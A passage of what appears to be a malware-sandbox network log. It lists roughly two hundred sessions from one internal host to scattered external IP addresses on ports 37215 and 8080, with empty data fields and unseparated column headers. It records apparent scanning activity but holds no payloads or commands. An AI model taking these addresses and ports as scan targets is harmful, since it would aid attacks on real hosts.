                                                        17408192.168.2.235837041.66.156.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17409192.168.2.233876841.42.14.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17410192.168.2.2348386157.231.69.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17411192.168.2.2347002197.119.67.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17412192.168.2.2352124197.228.88.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17413192.168.2.233500041.171.222.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17414192.168.2.233607241.228.35.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17415192.168.2.2338062157.229.18.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17416192.168.2.2353098161.189.67.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17417192.168.2.2345380157.90.190.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17418192.168.2.234247441.199.34.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17419192.168.2.235455459.58.13.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17420192.168.2.2335298144.92.145.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17421192.168.2.2343252223.196.124.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17422192.168.2.2358480175.16.252.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17423192.168.2.233575898.1.34.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17424192.168.2.233637662.215.210.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17425192.168.2.2356924128.29.1.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17426192.168.2.2338940114.81.181.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17427192.168.2.233442060.78.16.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17428192.168.2.2337424182.183.70.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17429192.168.2.2349466186.172.236.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17430192.168.2.235420466.156.112.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17431192.168.2.2359580158.84.179.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17432192.168.2.2346938168.251.100.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17433192.168.2.2360780180.63.232.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17434192.168.2.233440694.66.153.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17435192.168.2.234186018.248.54.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17436192.168.2.2335452111.225.19.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17437192.168.2.235465088.119.90.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17438192.168.2.2359522181.4.76.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17439192.168.2.2336904146.91.211.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17440192.168.2.2356960196.219.125.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17441192.168.2.234609260.197.151.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17442192.168.2.233711842.153.17.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17443192.168.2.2343542190.56.1.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17444192.168.2.234842852.108.90.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17445192.168.2.2355240187.230.124.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17446192.168.2.2337340203.246.150.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17447192.168.2.2336726121.143.202.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17448192.168.2.2344606223.44.16.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17449192.168.2.235443059.130.67.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17450192.168.2.2337038205.40.156.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17451192.168.2.235813278.57.190.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17452192.168.2.2336550207.100.179.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17453192.168.2.2359228202.62.190.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17454192.168.2.234855032.190.169.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17455192.168.2.2339222213.133.82.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17456192.168.2.2346564117.61.99.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17457192.168.2.2339324186.223.237.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17458192.168.2.2332824207.171.166.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17459192.168.2.233519838.234.113.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17460192.168.2.2349870208.0.87.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17461192.168.2.2349474209.197.185.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17462192.168.2.2344238159.255.10.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17463192.168.2.236015838.52.248.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17464192.168.2.2338320131.133.2.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17465192.168.2.2339440187.114.111.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17466192.168.2.2352890129.115.116.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17467192.168.2.2341190183.189.88.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17468192.168.2.2335914178.52.79.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17469192.168.2.2336440136.51.247.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17470192.168.2.2353400182.236.213.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17471192.168.2.2349522191.231.162.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17472192.168.2.2360636212.39.3.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17473192.168.2.2351542190.89.83.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17474192.168.2.235628884.97.206.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17475192.168.2.2338028142.172.176.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17476192.168.2.235650267.17.240.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17477192.168.2.233570245.210.89.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17478192.168.2.2333980190.86.251.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17479192.168.2.2337400176.106.99.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17480192.168.2.2340822137.179.52.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17481192.168.2.2343898149.210.203.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17482192.168.2.2359784204.109.22.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17483192.168.2.233970051.179.55.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17484192.168.2.234549640.27.127.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17485192.168.2.2358580174.13.40.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17486192.168.2.2336704165.182.126.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17487192.168.2.234727649.55.138.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17488192.168.2.234937092.255.30.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17489192.168.2.2343710109.229.217.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17490192.168.2.235945444.112.25.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17491192.168.2.2336920176.166.83.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17492192.168.2.235919423.217.250.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17493192.168.2.233570844.150.179.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17494192.168.2.2356796204.238.30.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17495192.168.2.235646452.153.76.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17496192.168.2.2349910192.170.27.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17497192.168.2.2350148136.101.133.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17498192.168.2.233717027.217.67.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17499192.168.2.2358118221.122.211.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17500192.168.2.2348914150.7.124.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17501192.168.2.2354300163.30.105.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17502192.168.2.233292298.185.138.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17503192.168.2.234070894.77.200.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17504192.168.2.235341258.118.140.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17505192.168.2.236096091.203.1.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17506192.168.2.233291096.120.245.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17507192.168.2.235208074.72.17.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17508192.168.2.2344068160.179.241.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17509192.168.2.2352766163.116.107.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17510192.168.2.2339040204.108.105.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17511192.168.2.2347116142.110.132.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17512192.168.2.2333826131.92.62.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17513192.168.2.2357046193.127.151.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17514192.168.2.2351006209.50.138.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17515192.168.2.235009081.232.36.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17516192.168.2.2339746208.104.173.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17517192.168.2.2351780146.33.86.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17518192.168.2.23339624.170.57.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17519192.168.2.234374281.211.234.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17520192.168.2.2337816221.132.136.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17521192.168.2.2349980155.47.161.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17522192.168.2.233493635.252.237.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17523192.168.2.2347188218.243.212.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17524192.168.2.235627278.108.216.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17525192.168.2.234397686.251.83.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17526192.168.2.233973260.174.251.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17527192.168.2.234395418.221.142.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17528192.168.2.2349400100.158.86.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17529192.168.2.2333142220.132.159.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17530192.168.2.233469640.192.60.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17531192.168.2.2341156186.37.48.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17532192.168.2.2338296132.135.155.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17533192.168.2.2351904176.118.212.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17534192.168.2.2338562206.206.230.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17535192.168.2.2345510181.139.43.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17536192.168.2.234295441.98.146.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17537192.168.2.23553185.77.97.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17538192.168.2.233915644.254.197.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17539192.168.2.2333874174.7.168.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17540192.168.2.2340456124.33.254.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17541192.168.2.234232286.218.43.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17542192.168.2.2336412156.30.166.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17543192.168.2.2335556207.52.70.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17544192.168.2.2342482104.90.251.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17545192.168.2.2336012159.217.42.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17546192.168.2.235062883.9.215.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17547192.168.2.2342312178.195.223.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17548192.168.2.235379094.115.248.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17549192.168.2.2347976222.81.208.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17550192.168.2.2337292199.23.251.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17551192.168.2.2357986126.67.208.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17552192.168.2.234766034.171.181.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17553192.168.2.2350888112.128.169.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17554192.168.2.2339988122.252.124.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17555192.168.2.234041085.40.1.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17556192.168.2.234147690.148.24.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17557192.168.2.2334662147.197.188.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17558192.168.2.2356688194.22.248.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17559192.168.2.2347434147.23.178.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17560192.168.2.2338196137.166.244.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17561192.168.2.2337060151.69.209.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17562192.168.2.2349748197.235.137.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17563192.168.2.2346720114.132.201.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17564192.168.2.2347124107.92.189.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17565192.168.2.2337256129.219.192.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17566192.168.2.2358062208.126.98.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17567192.168.2.2344540119.247.61.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17568192.168.2.23581605.208.75.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17569192.168.2.2336868211.67.61.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17570192.168.2.234129461.44.96.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17571192.168.2.2356702144.155.84.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17572192.168.2.234644885.176.65.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17573192.168.2.2342530208.96.52.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17574192.168.2.234584446.153.222.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17575192.168.2.233757467.51.74.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17576192.168.2.2339222168.254.214.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17577192.168.2.235279287.65.178.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17578192.168.2.2334824180.66.147.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17579192.168.2.2348362103.109.175.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17580192.168.2.2337578175.14.196.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17581192.168.2.233812462.45.161.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17582192.168.2.234243217.252.57.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17583192.168.2.235674441.45.199.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17584192.168.2.2360164189.247.12.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17585192.168.2.2354278178.12.99.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17586192.168.2.235692470.122.17.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17587192.168.2.2353028188.0.32.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17588192.168.2.236084860.177.45.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17589192.168.2.2356420183.65.129.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17590192.168.2.2360068135.74.14.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17591192.168.2.235821262.175.202.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17592192.168.2.2342656170.85.233.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17593192.168.2.234614413.114.90.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17594192.168.2.2356920100.11.221.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17595192.168.2.2336414135.158.37.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17596192.168.2.2349432143.9.128.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17597192.168.2.2348990112.148.128.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17598192.168.2.234358477.23.243.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17599192.168.2.234208698.83.97.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17600192.168.2.234733813.179.30.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17601192.168.2.2333842179.40.53.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17602192.168.2.2343944156.232.204.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17603192.168.2.2350504221.104.82.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17604192.168.2.234748449.141.130.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17605192.168.2.2360414209.76.61.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17606192.168.2.2343924219.222.227.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17607192.168.2.2357484116.58.7.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17608192.168.2.234620046.122.227.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17609192.168.2.235245096.229.39.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17610192.168.2.2348680164.102.110.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17611192.168.2.2342986212.155.248.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17612192.168.2.233591286.245.89.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17613192.168.2.234584624.171.74.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17614192.168.2.2339626100.218.7.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17615192.168.2.2334308201.252.74.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17616192.168.2.234300249.14.36.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17617192.168.2.2359886191.10.239.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17618192.168.2.23346368.241.238.1958080
